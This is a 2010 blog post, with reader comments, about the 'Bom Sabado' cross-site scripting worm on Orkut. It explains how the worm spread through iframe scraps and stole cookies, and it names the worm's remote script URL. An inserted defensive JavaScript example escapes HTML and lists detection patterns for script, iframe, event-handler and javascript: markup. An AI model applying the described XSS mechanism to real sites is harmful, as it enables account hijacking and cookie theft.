Orkut attacked by 'Bom Sabado' worm
Saturday, September 25, 2010
Surbhi Verma
‘Bom Sabado!’ ‘Bom Sabado!’ ‘Bom Sabado!’
Hi friends, did you find this scrap in your scrapbook from many of your friends? If yes, then don't visit the profile of the person the message came from, because your friend's profile is now infected by a virus named ‘Bom Sabado!’. If you visit any affected profile, your profile and your system will also be affected by this virus!
What is ‘Bom Sabado!’?
'Bom Sabado' is a new XSS (cross-site scripting) worm, created specifically to target Orkut.
'Bom Sabado' is Portuguese for 'Good Saturday'.
There is only one country in which Orkut is still the no. 1 social website, so it is assumed that someone made this virus to attack the popularity of Orkut.
How does it work?
When anyone opens a page that is infected by this worm, a JavaScript file (from http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) runs automatically. It automatically joins some communities and sends a scrap to your friends with the text “Bom Sabado!” along with iframe code that loads the same JavaScript again for your friends, who then join the communities and send links to their friends in turn. The worm also steals cookies from your browser.
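An added example, not part of the original post and not Orkut's code: the propagation described above only works if scrap text is echoed into the page as live markup, so the sketch below HTML-encodes scrap text at render time and triages stored scraps for active markup to find which accounts posted it. The function names, sample users and the harmless stand-in handler body are all constructed for illustration.

```javascript
// Encode HTML-significant characters so scrap text renders as text, not markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Markup that can run script if a scrap is echoed into the page unescaped.
const ACTIVE_MARKUP = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'frame-or-embed', re: /<\s*(iframe|frame|object|embed)\b/i },
  { name: 'event-handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { name: 'javascript-url', re: /(href|src)\s*=\s*["']?\s*javascript:/i },
];

function findActiveMarkup(scrapText) {
  return ACTIVE_MARKUP.filter((p) => p.re.test(scrapText)).map((p) => p.name);
}

// Flag stored scraps for cleanup and list the senders whose accounts posted them.
function triageScraps(scraps) {
  const flagged = scraps
    .map((s) => ({ id: s.id, from: s.from, hits: findActiveMarkup(s.text) }))
    .filter((s) => s.hits.length > 0);
  const senders = [...new Set(flagged.map((s) => s.from))].sort();
  return { flagged, senders };
}

// Constructed sample scraps (hypothetical users; the handler body is a harmless stand-in).
const WORM_SCRAP = '<iframe style=display:none onload="/* script loader */"></iframe>Bom Sabado!';
const SAMPLE_SCRAPS = [
  { id: 1, from: 'user_a', text: WORM_SCRAP },
  { id: 2, from: 'user_b', text: 'Happy birthday <3 see you on Saturday' },
  { id: 3, from: 'user_c', text: WORM_SCRAP },
  { id: 4, from: 'user_a', text: 'Bom Sabado!' },
];

const report = triageScraps(SAMPLE_SCRAPS);
console.log(report.senders, report.flagged.map((s) => s.id));
console.log(escapeHtml(WORM_SCRAP));
```

Encoding at render time is what stops the scrap from executing; the pattern scan is only a cleanup aid for finding already-stored scraps and the accounts that sent them.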
Orkut has temporarily fixed the issue.
On the Orkut Support Forums, a 'Top Contributor' has declared that Orkut has temporarily fixed the issue.
What can "temporarily" mean here? My guess is that they have only removed the JavaScript from the site http://tptools.org, but it will take time to fix this 'Hole of Orkut' to protect Orkut in the future. So just be aware!
I suggest you all disable JavaScript in your browser to avoid this type of problem :)
Suggestion for users Affected by Bom Sabado
As this virus steals cookies from the browser, it is suggested that you clear your browser's cookies immediately and change all your passwords.
Code of the Bom Sabado worm, taken from http://tptools.org/
All readers are most welcome to share their experience with these kinds of virus attacks!
6 comments for this post
deepa kashyap
September 25, 2010 at 4:45 PM
hey thanks a lot, as i checked my scrapbook i saw a msg like that only, 'Bom Sabado'. i was about to scrap him to ask what it means, in the meanwhile i checked your post and oh god, that's a virus attack!!
what if i will hide that scrap??
Sn34k3r
September 25, 2010 at 7:53 PM
"Bom Sabado" Bug Creating Problems in Orkut
what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!
Today in the morning i saw every account was posting a scrap, something like bomb amungu or Bom Sabado.
And those who are reading this scrap, even in their own profile, their cookies are also stolen and so they are also automatically posting the same scrap to their friend list, bomb something like :(
The script is running on, and a flag is also coming up in the status of profiles. i mean the status is automatically updated in some profiles. It's the flag of Brazil. The Google team is already working on it.
By the way, Bom Sabado means Good Saturday
Currently what u should do is
Solutions:-
Follow these steps:
1. Immediately change your password and security question (including secondary email and mobile number if they also got changed). This will solve the problem.
2. Find out whether some communities have been joined automatically. if yeah, do remove them.
3. If your account has been completely hacked, see here:
http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
4. Always remember these points :
4.1 Do not ever log in to any site other than www.orkut.com
4.2 Do not ever run any JavaScript while logged into your Orkut account
4.3 Never use any flooder in your account
4.4 Do not ever share your password with anyone else, and keep changing your password regularly.
4.5 Do not ever click a suspicious link while logged into your Orkut a/c. if you are curious you can copy the link and check it in another browser after cleaning that browser's cookies and cache.
4.6 Do not ever install any suspicious script on Greasemonkey and ALWAYS DISABLE THE GM before logging in to Orkut.
4.7 Do your mobile verification also, so that you can get back your a/c if the hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings
4.8 Install a good, updated antivirus and anti-keylogger and keep your system free from keyloggers and backdoor trojans.
4.9 Use a virtual keyboard to enter your password for more security. KIS 2010 provides it and there are many other virtual keyboards available.
Take a look here and follow the points given to protect your a/c:
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
and
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
hope this helps you...;)
happy Orkutting..
Surbhi Verma
September 26, 2010 at 12:09 AM
@Deepa....No need to hide scrap, the problem is fixed now :)
But be aware for future.. never check the affected profile in future, if again this type of msg come!!!!
sudhansh jain
September 26, 2010 at 7:44 AM
Yeah i have also got some scraps like that... but thank god my profile is not affected by that!!
LoGaN
September 26, 2010 at 5:03 PM
If the browser is run sandboxed, with that "Sandboxie" tool you gave, will it protect the system from the virus, or the orkut profile, to any extent?
Surbhi Verma
September 28, 2010 at 8:20 PM
@Logan... very good question....
well, in these types of attack in which the hacker steals cookies of the browser, Sandboxie could not protect the users either, coz if u run your browser in the sandbox and still keep saved passwords, then they will be accessible by the sandbox, meaning it can be hacked by cookie stealers.